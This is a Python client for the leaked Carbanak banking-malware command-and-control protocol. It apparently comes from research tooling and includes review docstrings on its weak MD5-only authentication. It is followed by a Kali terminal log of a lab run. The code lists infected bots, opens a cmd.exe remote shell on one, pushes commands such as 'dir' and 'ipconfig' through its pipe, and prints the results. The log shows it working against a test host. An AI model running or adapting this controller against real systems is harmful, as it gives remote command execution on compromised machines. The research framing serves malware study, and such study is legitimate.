Carbanak Server
import socket
import hashlib
import struct
import time
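class IdUid:
    """One bot record as decoded from the C2's GetIds reply.

    Attributes are filled in by Server.CM_GetIds in wire order:
    id (int), uid, info, ip, comment, ports (all cp1251 strings) and
    idGroups (int). The original ``__init__`` assigned bare locals, so
    the attributes did not exist until a caller set them; they are now
    real instance attributes initialised to None.
    """

    def __init__(self):
        self.id = None        # numeric bot id, passed as the id field of later CM_* calls
        self.uid = None       # string bot uid
        self.info = None      # free-text host description from the server
        self.ip = None
        self.comment = None
        self.ports = None
        self.idGroups = None

    def __repr__(self):
        return f"{type(self).__name__}(id={self.id!r}, uid={self.uid!r}, ip={self.ip!r})"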
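class StreamPipeInfo:
    """One (stream id, pipe name) pair from the C2's GetPipeStreams reply.

    Filled in by Server.CM_GetPipeStreams: ``id`` is the int stream id
    later passed to CM_GetStream, ``namePipe`` the cp1251 pipe name. The
    original assigned bare locals in ``__init__`` instead of attributes.
    """

    def __init__(self):
        self.id = None
        self.namePipe = None

    def __repr__(self):
        return f"{type(self).__name__}(id={self.id!r}, namePipe={self.namePipe!r})"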
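class Server:
    """Client for the Carbanak C2 control protocol (talks to its Server.exe).

    The name is inherited from the gist; this object is the
    *controller-side client*: it opens one TCP connection to the C2,
    authenticates by sending a raw MD5(password) digest, then issues
    commands as an ``(id, cmd)`` pair of little-endian 32-bit ints
    followed by command-specific fields. Strings on the wire are a
    16-bit little-endian length prefix followed by cp1251 bytes.

    Security review notes (this is research tooling for a leaked C2):
      * The only authentication is the 16-byte MD5 digest sent once, in
        the clear, right after connect (Get_Connect). There is no
        challenge/response, so a captured connection can be replayed.
      * Everything received is attacker-controlled. All reads go through
        _recv_exact so a short TCP read cannot desynchronise the stream,
        and negative lengths are rejected before reaching recv()/struct.
      * Host, port and password are now constructor parameters with the
        gist's original values as defaults; the instance attributes
        HOST, PORT and PSWD_HASH are kept for existing callers.
    """

    # command codes understood by the C2 (values as in the original)
    CmdGetIds = 1
    CmdSendCmd = 2
    CmdJoinStream = 5
    CmdGetPipeStreams = 11
    CmdPutPipeData = 12

    def __init__(self, host='192.168.12.137', port=800, password='password'):
        """Connect to host:port and authenticate with MD5(password).

        Raises OSError (e.g. ConnectionRefusedError) when the connect fails.
        """
        self.HOST = host
        self.PORT = port
        self.PSWD_HASH = hashlib.md5(password.encode('utf-8')).digest()
        self.s = self.Get_Connect()

    # -- lifecycle ------------------------------------------------------
    def close(self):
        """Close the underlying socket; safe to call more than once."""
        if self.s is not None:
            self.s.close()
            self.s = None

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        self.close()
        return False

    # -- low-level framing ---------------------------------------------
    def _recv_exact(self, n):
        """Read exactly ``n`` bytes from the socket.

        Raises ValueError for a negative ``n`` (a hostile length prefix)
        and ConnectionError if the peer closes before ``n`` bytes arrive.
        """
        if n < 0:
            raise ValueError(f"invalid negative length {n} received from server")
        buf = bytearray()
        while len(buf) < n:
            chunk = self.s.recv(n - len(buf))
            if not chunk:
                raise ConnectionError(
                    f"connection closed after {len(buf)} of {n} expected bytes")
            buf.extend(chunk)
        return bytes(buf)

    def putBytes(self, data, index, size):
        """Send ``size`` bytes of ``data`` starting at ``index``.

        The original ignored index/size and sent the whole buffer; the
        only caller passes (0, len(data)), so honouring them is a no-op
        there and makes the signature truthful.
        """
        self.s.sendall(bytes(data[index:index + size]))

    def getInt(self):
        """Read one little-endian signed 32-bit int."""
        return struct.unpack('<i', self._recv_exact(4))[0]

    def putInt(self, data):
        """Send one little-endian signed 32-bit int."""
        self.s.sendall(struct.pack('<i', data))

    def getShort(self):
        """Read one little-endian signed 16-bit int."""
        return struct.unpack('<h', self._recv_exact(2))[0]

    def putShort(self, data):
        """Send one little-endian signed 16-bit int."""
        self.s.sendall(struct.pack('<h', data))

    def getString(self):
        """Read a 16-bit-length-prefixed cp1251 string.

        Raises ValueError if the server sends a negative length.
        """
        length = self.getShort()
        return self._recv_exact(length).decode("cp1251")

    def putString(self, data):
        """Send ``data`` as a 16-bit length prefix plus cp1251 bytes.

        The length is that of the encoded bytes (not of the str), which
        is what the receiver needs; the two only differ for characters
        cp1251 cannot encode, which raise UnicodeEncodeError here.
        """
        raw = data.encode("cp1251")
        self.putShort(len(raw))
        self.s.sendall(raw)

    # -- connection setup ----------------------------------------------
    def Get_Connect(self):
        """Open the TCP connection and send the raw MD5 password digest.

        Called from __init__. Note the digest is the entire
        authentication exchange: no nonce, no response from the server
        is waited for.
        """
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.HOST, self.PORT))
        s.sendall(self.PSWD_HASH)
        return s

    def GetConnect(self, id, cmd):
        """Send the ``(id, cmd)`` command header (despite the name, no connect)."""
        self.s.sendall(struct.pack('<ii', id, cmd))

    # -- C2 commands ---------------------------------------------------
    def CM_GetIds(self):
        """Enumerate connected bots; returns a list of IdUid records.

        The original read only the first record regardless of ``count``,
        leaving the rest unread in the socket; every record is now parsed.
        """
        self.GetConnect(0, self.CmdGetIds)
        count = self.getInt()
        print('count', count)
        ret = []
        for _ in range(count):
            iu = IdUid()
            iu.id = self.getInt()
            print('id', iu.id)
            iu.uid = self.getString()
            print('uid', iu.uid)
            iu.info = self.getString()
            print('info', iu.info)
            iu.ip = self.getString()
            print('ip', iu.ip)
            iu.comment = self.getString()
            print('comment', iu.comment)
            iu.ports = self.getString()
            print('ports', iu.ports)
            iu.idGroups = self.getInt()
            print('idGroups', iu.idGroups)
            ret.append(iu)
        return ret

    def CM_SendCmd(self, id, uid, cmd):
        """Send a command string to bot ``id``. ``uid`` is unused (kept for the API)."""
        self.GetConnect(id, self.CmdSendCmd)
        self.putString(cmd)

    def CM_GetStream(self, id, uid, idStream):
        """Join stream ``idStream`` of bot ``id``; returns the socket to read from."""
        self.GetConnect(id, self.CmdJoinStream)
        self.putInt(idStream)
        return self.s

    def CM_GetPipeStreams(self, id, uid, nameId):
        """List the pipe streams named ``nameId`` on bot ``id``.

        Returns a list of StreamPipeInfo; a non-positive count yields [].
        """
        self.GetConnect(id, self.CmdGetPipeStreams)
        self.putString(nameId)
        count = self.getShort()
        ret = []
        for _ in range(count):
            info = StreamPipeInfo()
            info.id = self.getInt()
            info.namePipe = self.getString()
            print(repr(info.id))
            print(repr(info.namePipe))
            ret.append(info)
        return ret

    def CM_PutPipeData(self, id, uid, namePipe, data, count):
        """Write ``count`` bytes of ``data`` into pipe ``namePipe`` on bot ``id``.

        Always returns True (no acknowledgement is read from the server).
        """
        self.GetConnect(id, self.CmdPutPipeData)
        self.putString(namePipe)
        self.putInt(count)
        self.putBytes(data, 0, count)
        return True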
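def StarterCmd(ids, delay=10):
    """Start a cmd.exe on the first bot and join its output stream.

    Three separate Server() connections are opened, exactly as the
    original did (one per C2 request); only the last one, the joined
    stream socket, is returned — the other two are not kept.

    Args:
        ids: list of IdUid records from Server.CM_GetIds; ids[0] is used.
        delay: seconds to wait after "cmd" before asking for its pipe
            (the bot needs time to spawn cmd.exe and register the pipe).

    Returns:
        (pipes, jS): the StreamPipeInfo list for the "cmd" pipe and the
        joined stream socket for pipes[0].

    Raises:
        RuntimeError if ids is empty or the bot reports no "cmd" pipe
        (the original raised a bare IndexError in both cases).
    """
    if not ids:
        raise RuntimeError("no bots to start a shell on")
    bot = ids[0]
    Server().CM_SendCmd(bot.id, bot.uid, "cmd")
    # wait a bit for pipe to become available
    time.sleep(delay)
    pipes = Server().CM_GetPipeStreams(bot.id, bot.uid, "cmd")
    if not pipes:
        raise RuntimeError('bot reported no "cmd" pipe streams')
    jS = Server().CM_GetStream(bot.id, bot.uid, pipes[0].id)  # joined stream socket
    return pipes, jS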
def SendInput(user_cmd: str, id: int, uid: str, pipeId: int, namePipe: str) -> None:
    """Push one command line into the bot's cmd.exe pipe via CmdPutPipeData.

    Builds the pipe frame by hand and hands it to Server().CM_PutPipeData
    on a fresh connection. ``uid`` is accepted for symmetry with the
    other CM_* calls but is not used here.

    Frame layout as actually emitted (see the NOTE below on the prefix):
      2 bytes              prefix: low byte of msg_pack.size, low byte of sz_data
      msg_pack.size bytes  header: cmd=1, 32 zero bytes, func=0, tag=0, sz_data
      sz_data bytes        the command line, cp866-encoded, CRLF-terminated
      4 bytes              constant 55
      4 bytes              pipeId
      2 bytes              zero
    ``sz`` is budgeted to exactly that total.
    """
    user_cmd = user_cmd+"\r\n"
    # character count; equals the byte count as long as every character
    # encodes to a single cp866 byte (true for the ASCII commands used here)
    sz_data = len(user_cmd)
    # cmd (UInt32), answer (byte * 32), func (UInt32), tag (UInt32), sz_data (Int32)
    msg_pack = struct.Struct("I32sIIi")
    msg = msg_pack.pack(1, bytearray('\x00' * 32, 'utf-8'), 0, 0, sz_data)
    user_data = bytearray(user_cmd, "866") # old school USSR 866 encoding
    sz = 2 + msg_pack.size + sz_data + 4 + 4 + 2
    data = bytearray(sz)
    i = 0
    # NOTE(review): the next two pack_into('i') calls advance the offset by 1, not 4,
    # so they overlap each other and are then mostly overwritten by ``msg`` at
    # offset 2. What survives on the wire is data[0] = msg_pack.size & 0xff and
    # data[1] = sz_data & 0xff (on a little-endian host), and ``sz`` budgets only
    # those 2 bytes. Changing this to ``i += 4`` would overrun the buffer; if the
    # server really expects two single-byte fields, pack them with 'BB' instead —
    # confirm against the C2's frame parser before touching it.
    struct.pack_into("i", data, i, msg_pack.size)
    i += 1
    struct.pack_into("i", data, i, sz_data)
    i += 1
    data[i:i+msg_pack.size] = msg
    i += msg_pack.size
    data[i:i+sz_data] = user_data
    i += sz_data
    # trailer: constant 55 (meaning not established here), the pipe id, and a zero short
    struct.pack_into("I", data, i, 55)
    i += 4
    struct.pack_into("I", data, i, pipeId)
    i += 4
    struct.pack_into("H", data, i, 0)
    i += 2
    Server().CM_PutPipeData(id, uid, namePipe, data, sz)
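# read from joined socket
def CmdOutputer(jS, delay=10, bufsize=2048):
    """Wait ``delay`` seconds, then read, print and return one chunk of pipe output.

    Args:
        jS: the joined stream socket returned by StarterCmd.
        delay: seconds to sleep before reading (the original always waited 10).
        bufsize: maximum bytes taken by the single recv().

    Returns:
        The chunk decoded as cp866 (the code page the demo output came
        back in). The original printed and returned None; returning the
        text lets callers keep it.

    Only one recv() is issued, so at most ``bufsize`` bytes are consumed
    per call; longer outputs stay in the socket for the next call. The
    socket is blocking and the stream has no framing, so a read-until-idle
    loop would need a timeout and is deliberately not done here.
    """
    if delay:
        time.sleep(delay)
    # read output from socket
    raw = jS.recv(bufsize)
    out = raw.decode("cp866")
    print(out)
    return out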
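def main() -> None:
    """Demo driver: enumerate bots, open a shell on the first one, run two commands.

    Guarded by ``__name__`` so importing this module for its Server
    class no longer fires live C2 traffic as a side effect. Exits with a
    message instead of an IndexError when the server reports no bots.
    """
    ids = Server().CM_GetIds()
    if not ids:
        raise SystemExit("server reported no connected bots")
    bot = ids[0]
    pipes, jS = StarterCmd(ids)
    pipe = pipes[0]
    SendInput("dir", bot.id, bot.uid, pipe.id, pipe.namePipe)
    CmdOutputer(jS)
    # give cmd.exe time to finish before queueing the next command
    time.sleep(10)
    SendInput("ipconfig", bot.id, bot.uid, pipe.id, pipe.namePipe)
    CmdOutputer(jS)


if __name__ == "__main__":
    main()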
root@kali:~/carbanak_rpc# python3 server.py
count 1
id 1
uid example0c3d2682004a49022
info OS: Win7SP1.x64, Domain: WIN-GS0JF9KMEJ2, User: ecks, Ver: 1.3
ip 192.168.12.136
comment
ports
idGroups 0
1
'GCZScvcfzUbGNcYDj'
║ Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????>C═ dir
Volume in drive C has no label.
Volume Serial Number is 4CBF-78E0
Directory of C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????
08/15/2019 07:18 AM <DIR> .
08/15/2019 07:18 AM <DIR> ..
07/22/2019 10:01 PM 147,456 bot.dll
07/22/2019 10:01 PM 150,528 bot.exe
07/22/2019 10:01 PM 100,352 botcmd.exe
07/22/2019 10:01 PM 6,773 bot_cmd.txt
08/15/2019 07:18 AM 150,528 bot_out.exe
07/22/2019 10:01 PM 155,136 bot_x64.dll
07/22/2019 10:01 PM 155,136 bot_x64.exe
07/22/2019 10:01 PM 88,576 builder.exe
07/22/2019 10:01 PM 6 builder_gui.config
07/22/2019 10:01 PM 3,507,712 builder_gui.exe
07/22/2019 10:01 PM 142,336 CmdManager.exe
07/22/2019 10:01 PM 98 CmdManager.xml
07/22/2019 10:01 PM 184 config_server.xml
08/15/2019 07:17 AM 1,076 example.config
07/22/2019 10:01 PM 74,752 Player.dll
07/22/2019 10:01 PM 6,656 PlayerExe.exe
08/15/2019 07:18 AM 308 private.key
08/15/2019 07:18 AM 84 public.key
08/15/2019 07:18 AM 348 public_key.txt
07/22/2019 10:01 PM 153,600 Server.exe
07/22/2019 10:01 PM 147,968 VncSharp.dll
07/22/2019 10:01 PM <DIR> _plugins
21 File(s) 4,989,613 bytes
3 Dir(s) 37,535,412,224 bytes free
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????>
ipconfig
Г╚
Windows IP Configuration
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::f506:2f75:c598:7843%11
IPv4 Address. . . . . . . . . . . : 192.168.12.136
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.{9B02B57E-595C-4236-9E7C-08CE5E649765}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : localdomain
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????>